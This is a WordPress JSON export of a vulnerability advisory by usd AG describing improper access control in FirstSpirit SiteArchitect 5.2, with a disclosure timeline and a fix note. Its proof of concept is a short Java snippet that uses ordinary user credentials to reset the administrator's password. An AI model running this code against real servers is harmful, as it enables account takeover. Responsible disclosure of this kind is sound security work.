{"id":16546,"date":"2021-07-07T12:52:42","date_gmt":"2021-07-07T10:52:42","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0012\/"},"modified":"2021-07-19T14:07:39","modified_gmt":"2021-07-19T12:07:39","slug":"usd-2018-0012","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0012\/","title":{"rendered":"usd-2018-0012"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0012 | FirstSpirit SiteArchitect\/5.2<\/span><\/h1>\n<p><span><\/span><br \/><strong>Advisory ID<\/strong><span>: usd-2018-0012<\/span><br \/><strong>CVE Number<\/strong><span>: N\/A<\/span><br \/><strong>Affected Product<\/strong><span>: FirstSpirit SiteArchitect<\/span><br \/><strong>Affected Version<\/strong><span>: 5.2<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Improper Access Control<\/span><br \/><strong>Security Risk<\/strong><span>: High<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.e-spirit.com\/de\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.e-spirit.com\/de\/<\/a><br \/><strong>Vendor Status<\/strong><span>: Fixed according to vendor in version 5.2.2109<\/span><\/p>\n<h3><\/h3>\n<h3>Description<\/h3>\n<p>Administrative functions are not properly protected by access control. This allows attackers access to administrative function such as changing passwords or adding new users.<\/p>\n<p>Access control involves the use of several protection mechanisms such as authentication, authorization and accountability. When any mechanism is not applied or otherwise fails, attackers can compromise the security of the software by gaining privileges, reading sensitive information, executing commands, evading detection, etc.<\/p>\n<p><span><\/span><\/p>\n<h3>Proof of Concept\u00a0<\/h3>\n<p><span>Generic example case:<\/span><\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]public static void main(String[] args) throws Exception {<br \/>\nConnectionManager.setProxy((Proxy) null);<br \/>\nConnectionManager.setCompression((byte) 0);<br \/>\nConnectionManager.setEncryption((byte) 2);<br \/>\nConnectionManager.setUseHttps(false);<\/p>\n<p>ServerConnection c = (ServerConnection) ConnectionManager.getConnection(\"\", 8000, 1, \"user\", \"password\");<br \/>\nc.connect();<\/p>\n<p>UserManager userManager = c.getManager(UserManager.class);<br \/>\nUserDTO admin = userManager.getAdminUser();<br \/>\nadmin.setPassword(\"test\");<br \/>\nuserManager.updateUserData(admin);<br \/>\n}<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<div class=\"e11146-18 x-container max width\">\n<div class=\"e11146-19 x-column x-sm x-1-1\">\n<div class=\"x-text\">\n<p>Access to sensitive functions should be avoided. Necessary access should be protected by authentication and a global access control explicitly.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<h3><\/h3>\n<h3><\/h3>\n<h3><\/h3>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>2018-04-04 First contact request via info@e-spirit.com<\/li>\n<li>2018-04-24 Send vulnerabilities to vendor<\/li>\n<li>2018-05-15 Vendor releases a patch to fix the vulnerabilities<\/li>\n<li>2018-07-06 Security advisory released<\/li>\n<\/ul>\n<h3><\/h3>\n<h3><\/h3>\n<h3>Credits<\/h3>\n<p><span>This security vulnerabilities were found by Sebastian Puttkammer of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0012 | FirstSpirit SiteArchitect\/5.2 Advisory ID: usd-2018-0012CVE Number: N\/AAffected Product: FirstSpirit SiteArchitectAffected Version: 5.2Vulnerability Type: Improper Access ControlSecurity Risk: HighVendor URL: https:\/\/www.e-spirit.com\/de\/Vendor Status: Fixed according to vendor in version 5.2.2109 Description Administrative functions are not properly protected by access control. This allows attackers access to administrative function such as changing passwords or adding new users. [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16546","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16546"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16546\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}